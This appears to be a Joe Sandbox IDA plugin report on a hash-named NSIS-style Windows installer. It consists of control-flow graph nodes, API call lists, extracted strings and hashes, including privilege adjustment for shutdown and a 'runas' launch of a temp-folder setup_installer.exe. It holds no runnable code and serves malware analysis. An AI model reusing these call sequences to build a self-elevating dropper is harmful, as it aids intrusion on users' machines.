3732->3734 3735 405e11 3 API calls 3733->3735 3733->3752 3734->3724 3737 405d09 3734->3737 3736 405ddc 3735->3736 3739 405c06 5 API calls 3736->3739 3738 405d90 FindNextFileW 3737->3738 3748 405c4e 60 API calls 3737->3748 3750 4055a4 24 API calls 3737->3750 3753 4055a4 24 API calls 3737->3753 3754 406302 36 API calls 3737->3754 3756 40653c lstrcpynW 3737->3756 3757 405c06 3737->3757 3738->3737 3742 405da6 FindClose 
3738->3742 3741 405de8 3739->3741 3743 405e02 3741->3743 3744 405dec 3741->3744 3742->3724 3746 4055a4 24 API calls 3743->3746 3747 4055a4 24 API calls 3744->3747 3744->3752 3746->3752 3749 405df9 3747->3749 3748->3737 3751 406302 36 API calls 3749->3751 3750->3738 3751->3752 3753->3737 3754->3737 3755->3726 3756->3737 3765 40600d GetFileAttributesW 3757->3765 3760 405c33 3760->3737 3761 405c21 RemoveDirectoryW 3763 405c2f 3761->3763 3762 405c29 DeleteFileW 3762->3763 3763->3760 3764 405c3f SetFileAttributesW 3763->3764 3764->3760 3766 405c12 3765->3766 3767 40601f SetFileAttributesW 3765->3767 3766->3760 3766->3761 3766->3762 3767->3766 4582 401b9b 4583 401bec 4582->4583 4584 401ba8 4582->4584 4586 401bf1 4583->4586 4587 401c16 GlobalAlloc 4583->4587 4585 401c31 4584->4585 4590 401bbf 4584->4590 4588 406579 17 API calls 4585->4588 4596 402395 4585->4596 4586->4596 4603 40653c lstrcpynW 4586->4603 4589 406579 17 API calls 4587->4589 4591 40238f 4588->4591 4589->4585 4601 40653c lstrcpynW 4590->4601 4597 405ba2 MessageBoxIndirectW 4591->4597 4594 401c03 GlobalFree 4594->4596 4595 401bce 4602 40653c lstrcpynW 4595->4602 4597->4596 4599 401bdd 4604 40653c lstrcpynW 4599->4604 4601->4595 4602->4599 4603->4594 4604->4596 4605 402b9d SendMessageW 4606 402bb7 InvalidateRect 4605->4606 4607 402bc2 4605->4607 4606->4607 4608 40149e 4609 402395 4608->4609 4610 4014ac PostQuitMessage 4608->4610 4610->4609 4611 402522 4612 402d7e 17 API calls 4611->4612 4613 40252c 4612->4613 4614 402d3e 17 API calls 4613->4614 4615 402535 4614->4615 4616 402540 RegQueryValueExW 4615->4616 4621 402925 4615->4621 4617 402560 4616->4617 4618 402566 RegCloseKey 4616->4618 4617->4618 4622 406483 wsprintfW 4617->4622 4618->4621 4622->4618 4623 4021a2 4624 402d3e 17 API calls 4623->4624 4625 4021a9 4624->4625 4626 402d3e 17 API calls 4625->4626 4627 4021b3 4626->4627 4628 402d3e 17 API calls 4627->4628 4629 4021bd 4628->4629 4630 402d3e 17 API calls 4629->4630 4631 4021c7 4630->4631 4632 402d3e 17 
API calls 4631->4632 4634 4021d1 4632->4634 4633 402210 CoCreateInstance 4638 40222f 4633->4638 4634->4633 4635 402d3e 17 API calls 4634->4635 4635->4633 4636 401423 24 API calls 4637 4022ee 4636->4637 4638->4636 4638->4637 4639 4015a3 4640 402d3e 17 API calls 4639->4640 4641 4015aa SetFileAttributesW 4640->4641 4642 4015bc 4641->4642 4643 401fa4 4644 402d3e 17 API calls 4643->4644 4645 401faa 4644->4645 4646 4055a4 24 API calls 4645->4646 4647 401fb4 4646->4647 4648 405b25 2 API calls 4647->4648 4649 401fba 4648->4649 4650 401fdd CloseHandle 4649->4650 4652 4069dc 5 API calls 4649->4652 4653 402925 4649->4653 4650->4653 4654 401fcf 4652->4654 4654->4650 4656 406483 wsprintfW 4654->4656 4656->4650 4664 40202a 4665 402d3e 17 API calls 4664->4665 4666 402031 4665->4666 4667 406931 5 API calls 4666->4667 4668 402040 4667->4668 4669 4020c4 4668->4669 4670 40205c GlobalAlloc 4668->4670 4670->4669 4671 402070 4670->4671 4672 406931 5 API calls 4671->4672 4673 402077 4672->4673 4674 406931 5 API calls 4673->4674 4675 402081 4674->4675 4675->4669 4679 406483 wsprintfW 4675->4679 4677 4020b6 4680 406483 wsprintfW 4677->4680 4679->4677 4680->4669 4681 4023aa 4682 4023b2 4681->4682 4683 4023b8 4681->4683 4684 402d3e 17 API calls 4682->4684 4685 4023c6 4683->4685 4686 402d3e 17 API calls 4683->4686 4684->4683 4687 4023d4 4685->4687 4688 402d3e 17 API calls 4685->4688 4686->4685 4689 402d3e 17 API calls 4687->4689 4688->4687 4690 4023dd WritePrivateProfileStringW 4689->4690 4691 402f2b 4692 402f56 4691->4692 4693 402f3d SetTimer 4691->4693 4694 402fa4 4692->4694 4695 402faa MulDiv 4692->4695 4693->4692 4696 402f64 wsprintfW SetWindowTextW SetDlgItemTextW 4695->4696 4696->4694 4698 40242c 4699 402434 4698->4699 4700 40245f 4698->4700 4701 402d7e 17 API calls 4699->4701 4702 402d3e 17 API calls 4700->4702 4703 40243b 4701->4703 4704 402466 4702->4704 4706 402d3e 17 API calls 4703->4706 4707 402473 4703->4707 4709 402dfc 4704->4709 4708 40244c RegDeleteValueW RegCloseKey 
4706->4708 4708->4707 4710 402e10 4709->4710 4712 402e09 4709->4712 4710->4712 4713 402e41 4710->4713 4712->4707 4714 4063a9 RegOpenKeyExW 4713->4714 4715 402e6f 4714->4715 4716 402e7f RegEnumValueW 4715->4716 4720 402ea2 4715->4720 4724 402f19 4715->4724 4717 402f09 RegCloseKey 4716->4717 4716->4720 4717->4724 4718 402ede RegEnumKeyW 4719 402ee7 RegCloseKey 4718->4719 4718->4720 4721 406931 5 API calls 4719->4721 4720->4717 4720->4718 4720->4719 4722 402e41 6 API calls 4720->4722 4723 402ef7 4721->4723 4722->4720 4723->4724 4725 402efb RegDeleteKeyW 4723->4725 4724->4712 4725->4724 4726 401a30 4727 402d3e 17 API calls 4726->4727 4728 401a39 ExpandEnvironmentStringsW 4727->4728 4729 401a60 4728->4729 4730 401a4d 4728->4730 4730->4729 4731 401a52 lstrcmpW 4730->4731 4731->4729 4737 401735 4738 402d3e 17 API calls 4737->4738 4739 40173c SearchPathW 4738->4739 4740 401757 4739->4740 4741 402636 4742 402665 4741->4742 4743 40264a 4741->4743 4744 402695 4742->4744 4745 40266a 4742->4745 4746 402d1c 17 API calls 4743->4746 4748 402d3e 17 API calls 4744->4748 4747 402d3e 17 API calls 4745->4747 4753 402651 4746->4753 4749 402671 4747->4749 4750 40269c lstrlenW 4748->4750 4758 40655e WideCharToMultiByte 4749->4758 4750->4753 4752 402685 lstrlenA 4752->4753 4754 4026df 4753->4754 4755 4026c9 4753->4755 4757 406113 5 API calls 4753->4757 4755->4754 4756 4060e4 WriteFile 4755->4756 4756->4754 4757->4755 4758->4752 4759 401d38 4760 402d1c 17 API calls 4759->4760 4761 401d3f 4760->4761 4762 402d1c 17 API calls 4761->4762 4763 401d4b GetDlgItem 4762->4763 4764 402630 4763->4764 4765 4014b8 4766 4014be 4765->4766 4767 401389 2 API calls 4766->4767 4768 4014c6 4767->4768 4769 403fb9 4770 403fd1 4769->4770 4771 40410c 4769->4771 4770->4771 4772 403fdd 4770->4772 4773 40411d GetDlgItem GetDlgItem 4771->4773 4782 40415d 4771->4782 4774 403fe8 SetWindowPos 4772->4774 4775 403ffb 4772->4775 4776 404492 18 API calls 4773->4776 4774->4775 4779 404000 ShowWindow 4775->4779 4780 404018 
4775->4780 4781 404147 SetClassLongW 4776->4781 4777 4041b7 4778 4044de SendMessageW 4777->4778 4783 404107 4777->4783 4809 4041c9 4778->4809 4779->4780 4784 404020 DestroyWindow 4780->4784 4785 40403a 4780->4785 4786 40140b 2 API calls 4781->4786 4782->4777 4787 401389 2 API calls 4782->4787 4788 40441b 4784->4788 4789 404050 4785->4789 4790 40403f SetWindowLongW 4785->4790 4786->4782 4791 40418f 4787->4791 4788->4783 4798 40444c ShowWindow 4788->4798 4795 4040c7 4789->4795 4796 40405c GetDlgItem 4789->4796 4790->4783 4791->4777 4792 404193 SendMessageW 4791->4792 4792->4783 4793 40140b 2 API calls 4793->4809 4794 40441d DestroyWindow EndDialog 4794->4788 4797 4044f9 8 API calls 4795->4797 4799 40408c 4796->4799 4800 40406f SendMessageW IsWindowEnabled 4796->4800 4797->4783 4798->4783 4802 404099 4799->4802 4803 4040e0 SendMessageW 4799->4803 4804 4040ac 4799->4804 4812 404091 4799->4812 4800->4783 4800->4799 4801 406579 17 API calls 4801->4809 4802->4803 4802->4812 4803->4795 4807 4040b4 4804->4807 4808 4040c9 4804->4808 4805 40446b SendMessageW 4805->4795 4806 404492 18 API calls 4806->4809 4810 40140b 2 API calls 4807->4810 4811 40140b 2 API calls 4808->4811 4809->4783 4809->4793 4809->4794 4809->4801 4809->4806 4813 404492 18 API calls 4809->4813 4829 40435d DestroyWindow 4809->4829 4810->4812 4811->4812 4812->4795 4812->4805 4814 404244 GetDlgItem 4813->4814 4815 404261 ShowWindow EnableWindow 4814->4815 4816 404259 4814->4816 4838 4044b4 EnableWindow 4815->4838 4816->4815 4818 40428b EnableWindow 4823 40429f 4818->4823 4819 4042a4 GetSystemMenu EnableMenuItem SendMessageW 4820 4042d4 SendMessageW 4819->4820 4819->4823 4820->4823 4822 403f9a 18 API calls 4822->4823 4823->4819 4823->4822 4839 4044c7 SendMessageW 4823->4839 4840 40653c lstrcpynW 4823->4840 4825 404303 lstrlenW 4826 406579 17 API calls 4825->4826 4827 404319 SetWindowTextW 4826->4827 4828 401389 2 API calls 4827->4828 4828->4809 4829->4788 4830 404377 CreateDialogParamW 4829->4830 4830->4788 
4831 4043aa 4830->4831 4832 404492 18 API calls 4831->4832 4833 4043b5 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4832->4833 4834 401389 2 API calls 4833->4834 4835 4043fb 4834->4835 4835->4783 4836 404403 ShowWindow 4835->4836 4837 4044de SendMessageW 4836->4837 4837->4788 4838->4818 4839->4823 4840->4825 4841 4028bb 4842 4028c1 4841->4842 4843 402bc2 4842->4843 4844 4028c9 FindClose 4842->4844 4844->4843 4845 40493c 4846 404972 4845->4846 4847 40494c 4845->4847 4849 4044f9 8 API calls 4846->4849 4848 404492 18 API calls 4847->4848 4851 404959 SetDlgItemTextW 4848->4851 4850 40497e 4849->4850 4851->4846

                                        Control-flow Graph (graph image not reproduced in this export)
                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 004035FB
                                        • GetVersion.KERNEL32 ref: 00403601
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
                                        • OleInitialize.OLE32(00000000), ref: 00403678
                                        • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
                                        • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",00000020,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",00000000,?,00000007,00000009,0000000B), ref: 004036E1
                                          • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                          • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403838
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403854
                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
                                        • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                                          • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                        • ExitProcess.KERNEL32(00000007,?,00000007,00000009,0000000B), ref: 00403947
                                        • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
                                        • ExitProcess.KERNEL32 ref: 0040396D
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403980
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040398F
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040399A
                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
                                        • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
                                        • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
                                        • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                        • ExitProcess.KERNEL32 ref: 00403B13
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                        • API String ID: 424501083-572611694
                                        • Opcode ID: 192a59dcd8014d98a74b0244e035758c3ace76d32184e7546451a3a8955dee98
                                        • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
                                        • Opcode Fuzzy Hash: 192a59dcd8014d98a74b0244e035758c3ace76d32184e7546451a3a8955dee98
                                        • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 137 403c0b-403c23 call 406931 140 403c25-403c30 GetUserDefaultUILanguage call 406483 137->140 141 403c37-403c6e call 40640a 137->141 144 403c35 140->144 147 403c70-403c81 call 40640a 141->147 148 403c86-403c8c lstrcatW 141->148 146 403c91-403cba call 403ee1 call 405f19 144->146 154 403cc0-403cc5 146->154 155 403d4c-403d54 call 405f19 146->155 147->148 148->146 154->155 156 403ccb-403cf3 call 40640a 154->156 161 403d62-403d87 LoadImageW 155->161 162 403d56-403d5d call 406579 155->162 156->155 163 403cf5-403cf9 156->163 165 403e08-403e10 call 40140b 161->165 166 403d89-403db9 RegisterClassW 161->166 162->161 167 403d0b-403d17 lstrlenW 163->167 168 403cfb-403d08 call 405e3e 163->168 177 403e12-403e15 165->177 178 403e1a-403e25 call 403ee1 165->178 169 403ed7 166->169 170 403dbf-403e03 SystemParametersInfoW CreateWindowExW 166->170 174 403d19-403d27 lstrcmpiW 167->174 175 403d3f-403d47 call 405e11 call 40653c 167->175 168->167 173 403ed9-403ee0 169->173 170->165 174->175 181 403d29-403d33 GetFileAttributesW 174->181 175->155 177->173 189 403e2b-403e45 ShowWindow call 4068c1 178->189 190 403eae-403eb6 call 405677 178->190 184 403d35-403d37 181->184 185 403d39-403d3a call 405e5d 181->185 184->175 184->185 185->175 197 403e51-403e63 GetClassInfoW 189->197 198 403e47-403e4c call 4068c1 189->198 195 403ed0-403ed2 call 40140b 190->195 196 403eb8-403ebe 190->196 195->169 196->177 199 403ec4-403ecb call 40140b 196->199 202 403e65-403e75 GetClassInfoW RegisterClassW 197->202 203 403e7b-403eac DialogBoxParamW call 40140b call 403b5b 197->203 198->197 199->177 202->203 203->173
                                        APIs
                                          • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                          • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                        • GetUserDefaultUILanguage.KERNELBASE(00000002,74DF3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe",00000000), ref: 00403C25
                                          • Part of subcall function 00406483: wsprintfW.USER32 ref: 00406490
                                        • lstrcatW.KERNEL32(1033,00423748), ref: 00403C8C
                                        • lstrlenW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,?,?,?,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,74DF3420), ref: 00403D0C
                                        • lstrcmpiW.KERNEL32(?,.exe,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,?,?,?,runas C:\Users\user\AppData\Local\Temp\setup_installer.exe,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403D1F
                                        • GetFileAttributesW.KERNEL32(runas C:\Users\user\AppData\Local\Temp\setup_installer.exe), ref: 00403D2A
                                        • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp), ref: 00403D73
                                        • RegisterClassW.USER32(00429200), ref: 00403DB0
                                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403DC8
                                        • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403DFD
                                        • ShowWindow.USER32(00000005,00000000), ref: 00403E33
                                        • GetClassInfoW.USER32(00000000,RichEdit20W,00429200), ref: 00403E5F
                                        • GetClassInfoW.USER32(00000000,RichEdit,00429200), ref: 00403E6C
                                        • RegisterClassW.USER32(00429200), ref: 00403E75
                                        • DialogBoxParamW.USER32(?,00000000,00403FB9,00000000), ref: 00403E94
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$runas C:\Users\user\AppData\Local\Temp\setup_installer.exe
                                        • API String ID: 606308-919364621
                                        • Opcode ID: 48322becd3d8efe0cd832b317988b4041c355d21bd462e37230b45ba98bd7fc7
                                        • Instruction ID: e394074358681fdac01dfd3b015b47ae0866f78f7b6160babfbfeef1d79938ee
                                        • Opcode Fuzzy Hash: 48322becd3d8efe0cd832b317988b4041c355d21bd462e37230b45ba98bd7fc7
                                        • Instruction Fuzzy Hash: EA61D570240200BAD720AF66AD45F2B3A7CEB84B09F40457FF941B22E2CB7D9D12867D

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                         control_flow_graph 398 406c5b-406c60 399 406cd1-406cef 398->399 400 406c62-406c91 398->400 403 4072c7-4072dc 399->403 401 406c93-406c96 400->401 402 406c98-406c9c 400->402 404 406ca8-406cab 401->404 405 406ca4 402->405 406 406c9e-406ca2 402->406 407 4072f6-40730c 403->407 408 4072de-4072f4 403->408 410 406cc9-406ccc 404->410 411 406cad-406cb6 404->411 405->404 406->404 409 40730f-407316 407->409 408->409 415 407318-40731c 409->415 416 40733d-407349 409->416 414 406e9e-406ebc 410->414 412 406cb8 411->412 413 406cbb-406cc7 411->413 412->413 422 406d31-406d5f 413->422 420 406ed4-406ee6 414->420 421 406ebe-406ed2 414->421 417 407322-40733a 415->417 418 4074cb-4074d5 415->418 423 406adf-406ae8 416->423 417->416 424 4074e1-4074f4 418->424 427 406ee9-406ef3 420->427 421->427 425 406d61-406d79 422->425 426 406d7b-406d95 422->426 432 4074f6 423->432 433 406aee 423->433 429 4074f9-4074fd 424->429 428 406d98-406da2 425->428 426->428 430 406ef5 427->430 431 406e96-406e9c 427->431 435 406da8 428->435 436 406d19-406d1f 428->436 448 406e7b-406e93 430->448 449 40747d-407487 430->449 431->414 434 406e3a-406e44 431->434 432->429 438 406af5-406af9 433->438 439 406c35-406c56 433->439 440 406b9a-406b9e 433->440 441 406c0a-406c0e 433->441 444 407489-407493 434->444 445 406e4a-407013 434->445 454 407465-40746f 435->454 455 406cfe-406d16 435->455 446 406dd2-406dd8 436->446 447 406d25-406d2b 436->447 438->424 453 406aff-406b0c 438->453 439->403 451 406ba4-406bbd 440->451 452 40744a-407454 440->452 442 406c14-406c28 441->442 443 407459-407463 441->443 456 406c2b-406c33 442->456 443->424 444->424 445->423 458 406e36 446->458 460 406dda-406df8 446->460 447->422 447->458 448->431 449->424 459 406bc0-406bc4 451->459 452->424 453->432 461 406b12-406b58 453->461 454->424 455->436 456->439 456->441 458->434 459->440 464 406bc6-406bcc 459->464 465 406e10-406e22 460->465 466 406dfa-406e0e 460->466 462 406b80-406b82 461->462 463 406b5a-406b5e 461->463 469 406b90-406b98 462->469 470 406b84-406b8e 462->470 467 406b60-406b63 GlobalFree 463->467 468 406b69-406b77 GlobalAlloc 463->468 471 406bf6-406c08 464->471 472 406bce-406bd5 464->472 473 406e25-406e2f 465->473 466->473 467->468 468->432 474 406b7d 468->474 469->459 470->469 470->470 471->456 475 406be0-406bf0 GlobalAlloc 472->475 476 406bd7-406bda GlobalFree 472->476 473->446 477 406e31 473->477 474->462 475->432 475->471 476->475 479 407471-40747b 477->479 480 406db7-406dcf 477->480 479->424 480->446
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1684728749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                         • Associated: 00000000.00000002.1684714458.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684744175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684758289.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1684822761.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                        • Instruction ID: b5fdc14d1eddcf89792e2e646b4c6bd06a53190dca3d1b375e16d2eed6ded591
                                        • Opcode Fuzzy Hash: 4c5fc7cef62123189b146ae20f9b137f8dd1da47d9d14d17752a01c0449262ee
                                        • Instruction Fuzzy Hash: 78F16970D04229CBDF28CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 210 403068-4030b6 GetTickCount GetModuleFileNameW call 406032 213 4030c2-4030f0 call 40653c call 405e5d call 40653c GetFileSize 210->213 214 4030b8-4030bd 210->214 222 4030f6 213->222 223 4031db-4031e9 call 402fc6 213->223 215 403302-403306 214->215 225 4030fb-403112 222->225 229 4032ba-4032bf 223->229 230 4031ef-4031f2 223->230 227 403114 225->227 228 403116-40311f call 40357a 225->228 227->228 237 403125-40312c 228->237 238 403276-40327e call 402fc6 228->238 229->215 232 4031f4-40320c call 403590 call 40357a 230->232 233 40321e-40326a GlobalAlloc call 406a8c call 406061 CreateFileW 230->233 232->229 261 403212-403218 232->261 259 403280-4032b0 call 403590 call 403309 233->259 260 40326c-403271 233->260 242 4031a8-4031ac 237->242 243 40312e-403142 call 405fed 237->243 238->229 248 4031b6-4031bc 242->248 249 4031ae-4031b5 call 402fc6 242->249 243->248 257 403144-40314b 243->257 250 4031cb-4031d3 248->250 251 4031be-4031c8 call 406a1e 248->251 249->248 250->225 258 4031d9 250->258 251->250 257->248 264 40314d-403154 257->264 258->223 271 4032b5-4032b8 259->271 260->215 261->229 261->233 264->248 266 403156-40315d 264->266 266->248 268 40315f-403166 266->268 268->248 270 403168-403188 268->270 270->229 272 40318e-403192 270->272 271->229 273 4032c1-4032d2 271->273 274 403194-403198 272->274 275 40319a-4031a2 272->275 276 4032d4 273->276 277 4032da-4032df 273->277 274->258 274->275 275->248 279 4031a4-4031a6 275->279 276->277 278 4032e0-4032e6 277->278 278->278 280 4032e8-403300 call 405fed 278->280 279->248 280->215
                                        APIs
                                        • GetTickCount.KERNEL32 ref: 0040307C
                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,00000400), ref: 00403098
                                          • Part of subcall function 00406032: GetFileAttributesW.KERNELBASE(00000003,004030AB,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 00406036
                                          • Part of subcall function 00406032: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406058
                                        • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe,80000000,00000003), ref: 004030E1
                                        • GlobalAlloc.KERNEL32(00000040,0040A230), ref: 00403223
                                        Strings
                                        Memory Dump Source
